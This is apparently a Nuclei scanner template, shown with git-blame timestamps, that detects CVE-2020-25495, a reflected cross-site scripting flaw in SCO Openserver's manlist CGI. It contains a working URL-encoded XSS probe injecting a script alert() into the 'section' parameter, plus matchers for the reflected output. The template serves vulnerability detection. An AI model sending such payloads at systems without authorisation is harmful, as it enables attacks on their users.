2021-06-18 11:37:16 +00:00
id : CVE-2020-25495
info :
2022-05-13 20:26:43 +00:00
name : SCO Openserver 5.0.7 - 'section' Cross-Site scripting
2021-06-18 20:26:17 +00:00
author : 0x_Akoko
2021-06-18 11:37:16 +00:00
severity : medium
2022-05-13 20:26:43 +00:00
description : A reflected cross-site scripting (XSS) vulnerability in Xinuo (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section'.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/49300
2022-05-17 09:18:12 +00:00
- https://github.com/Ramikan/Vulnerabilities/blob/master/SCO%20Openserver%20XSS%20%26%20HTML%20Injection%20vulnerability
- http://packetstormsecurity.com/files/160634/SCO-Openserver-5.0.7-Cross-Site-Scripting.html
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-25495
cwe-id : CWE-79
2022-04-22 10:38:41 +00:00
tags : cve,cve2020,sco,xss
2021-06-18 11:37:16 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E'
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "<h1>hello</h1><script>alert(/{{randstr}}/)</script>"
part : body
- type : word
words :
- "text/html"
part : header